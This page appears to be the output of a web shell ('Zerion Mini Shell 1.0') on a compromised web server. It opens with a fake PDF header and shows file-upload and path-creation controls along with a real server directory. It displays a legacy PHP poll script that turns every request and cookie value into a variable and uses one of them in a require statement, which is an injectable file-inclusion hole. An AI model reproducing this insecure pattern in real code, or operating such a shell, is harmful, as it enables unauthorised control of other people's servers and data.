%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/dordingu/public_html/veg/pollphp/
Upload File :
Create Path :
Current File : /home/dordingu/public_html/veg/pollphp/png.php

<?php
$include_path = dirname(__FILE__);

if (!isset($PHP_SELF)) {
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if(isset($HTTP_COOKIE_VARS)){
        while (list($name, $value)=each($HTTP_COOKIE_VARS)){
            $$name=$value;
        }
    }
}

require $include_path."/include/config.inc.php";
require $include_path."/include/$POLLDB[class]";
require $include_path."/include/class_poll.php";
require $include_path."/include/class_pgfx.php";

$CLASS["db"] = new polldb_sql;
$CLASS["db"]->connect();
$php_poll = new pgfx();
if (isset($poll_id)) {
    $php_poll->output_png($poll_id,100);
}
?>

Zerion Mini Shell 1.0